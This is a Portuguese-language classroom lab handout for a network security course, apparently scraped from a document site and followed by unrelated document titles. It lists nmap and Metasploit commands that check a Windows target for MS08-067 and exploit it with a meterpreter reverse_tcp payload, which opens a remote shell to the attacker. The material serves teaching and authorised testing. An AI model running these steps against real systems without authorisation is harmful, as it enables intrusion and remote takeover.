Unidade6 roteiro pentest

1
Curso Superior de Tecnologia em Redes de Computadores Segurança de Redes Prof. Leandro Almeida 1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando # nmap -v –script=smb-check-vulns IP_DO_ALVO 2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando: # msfconsole 3. Escolha o exploit que irá explorar a vulnerabilidade msf> use exploit/windows/smb/ms08_067_netapi 4. Informe o IP do alvo msf exploit(ms08_067) > set RHOST IP_DO_ALVO 5. Escolha o payload(carga do exploit)     msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp 6. Informe o IP do atacante msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE 7. Execute o ataque msf exploit(ms08_067) > exploit 

Transcript of Unidade6 roteiro pentest

Page 1: Unidade6 roteiro pentest

Curso Superior de Tecnologia em Redes de ComputadoresSegurança de Redes

Prof. Leandro Almeida

1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando

# nmap ­v –script=smb­check­vulns IP_DO_ALVO

2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando:

# msfconsole

3. Escolha o exploit que irá explorar a vulnerabilidade

msf> use exploit/windows/smb/ms08_067_netapi

4. Informe o IP do alvo

msf exploit(ms08_067) > set RHOST IP_DO_ALVO

5. Escolha o payload(carga do exploit)

    msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp

6. Informe o IP do atacante

msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE

7. Execute o ataque

msf exploit(ms08_067) > exploit 

Pentest Profissional - Desec Security · 2019-03-09 · Pentest Profissional 6 Pesquisa e Experiência Assim que finalizado as duas primeiras fases você receberá o certificado de

Pentest Profissional - Desec Security · 2019-03-09 · Pentest Profissional 6 Pesquisa e Experiência Assim que finalizado as duas primeiras fases você receberá o certificado de

SEGURANÇA DE SISTEMAS E REDES TÁSSIO JOSÉ … · CONTEÚDO Visão geral sobre o Pentest Tipos de Pentest As fases de um ataque Categorias de ataques Metodologias existentes Como

SEGURANÇA DE SISTEMAS E REDES TÁSSIO JOSÉ … · CONTEÚDO Visão geral sobre o Pentest Tipos de Pentest As fases de um ataque Categorias de ataques Metodologias existentes Como

Pentest web

Pentest web

Testes de Invasão - Pentest

Testes de Invasão - Pentest

ROTEIRO - pescadorprofissional.com.brpescadorprofissional.com.br/pdf/rot-cs-completo.pdf · Roteiro de Navegação – Atlântico, Oceano, Costa Sul (Brasil). 2. Roteiro de Navegação

ROTEIRO - pescadorprofissional.com.brpescadorprofissional.com.br/pdf/rot-cs-completo.pdf · Roteiro de Navegação – Atlântico, Oceano, Costa Sul (Brasil). 2. Roteiro de Navegação

UNIVERSIDADE DE SÃO PAULO - sistemas.eel.usp.brsistemas.eel.usp.br/docentes/arquivos/6495737/DUR0001/Unidade6... · não conhecia o trabalho de Young. Era contrário a Napoleão

UNIVERSIDADE DE SÃO PAULO - sistemas.eel.usp.brsistemas.eel.usp.br/docentes/arquivos/6495737/DUR0001/Unidade6... · não conhecia o trabalho de Young. Era contrário a Napoleão

CHEFE, O PENTEST FINALIZOU! … E AGORA?

CHEFE, O PENTEST FINALIZOU! … E AGORA?

PONTIFÍCIA UNIVERSIDADE CATÓLICA DO PARANÁ ESCOLA … · 2018. 11. 21. · 5 conhecidos como pentest, ao ser capaz de modificar os dados trafegados entre as aplicações cliente

PONTIFÍCIA UNIVERSIDADE CATÓLICA DO PARANÁ ESCOLA … · 2018. 11. 21. · 5 conhecidos como pentest, ao ser capaz de modificar os dados trafegados entre as aplicações cliente

Animação 1 - Roteiro (4) Decupagem e Formatacao do Roteiro

Animação 1 - Roteiro (4) Decupagem e Formatacao do Roteiro

Roteiro 0002

Roteiro 0002

ROTEIRO DE ESTUDO/ATIVIDADES (11º Roteiro) ANO: 5º ...

ROTEIRO DE ESTUDO/ATIVIDADES (11º Roteiro) ANO: 5º ...

Comentários Sobre o Questionário da Sexta Aulaportalnewschool.com/Arquivos/PDFS/Pentest/O Livro Proibido do Curso... · Curso de Hacker do Profº Marco Aurélio ... Segue abaixo

Comentários Sobre o Questionário da Sexta Aulaportalnewschool.com/Arquivos/PDFS/Pentest/O Livro Proibido do Curso... · Curso de Hacker do Profº Marco Aurélio ... Segue abaixo

Roteiro - ULisboa

Roteiro - ULisboa

Pentest para Devs - static.eventials.com · Integração Contínua Ferramentas e Ideias. Foco. Foco Dar uma visão técnica e objetiva dos ataques atuais mais comuns. Foco Mostrar

Pentest para Devs - static.eventials.com · Integração Contínua Ferramentas e Ideias. Foco. Foco Dar uma visão técnica e objetiva dos ataques atuais mais comuns. Foco Mostrar

PENTEST, ANÁLISE E MITIGAÇÃO DE VULNERABILIDADES

PENTEST, ANÁLISE E MITIGAÇÃO DE VULNERABILIDADES

Unidade6 a 2012_csa_v2_gabarito

Unidade6 a 2012_csa_v2_gabarito

Palestra: Pentest - Intrusão de Redes

Palestra: Pentest - Intrusão de Redes

Forense computacional em Linux for dummiesportalnewschool.com/Arquivos/PDFS/Pentest/forense_linux.pdf · Forense computacional é a ciência voltada para a ... trônica digital, como

Forense computacional em Linux for dummiesportalnewschool.com/Arquivos/PDFS/Pentest/forense_linux.pdf · Forense computacional é a ciência voltada para a ... trônica digital, como

Adm sop-unidade6

Adm sop-unidade6

SOFTWARE PARA PENTEST EM REDES WIFI · 2020. 12. 16. · SOFTWARE PARA PENTEST EM REDES WIFI Projeto de pesquisa apresentado ao Instituto Municipal de Ensino Superior de Assis –

SOFTWARE PARA PENTEST EM REDES WIFI · 2020. 12. 16. · SOFTWARE PARA PENTEST EM REDES WIFI Projeto de pesquisa apresentado ao Instituto Municipal de Ensino Superior de Assis –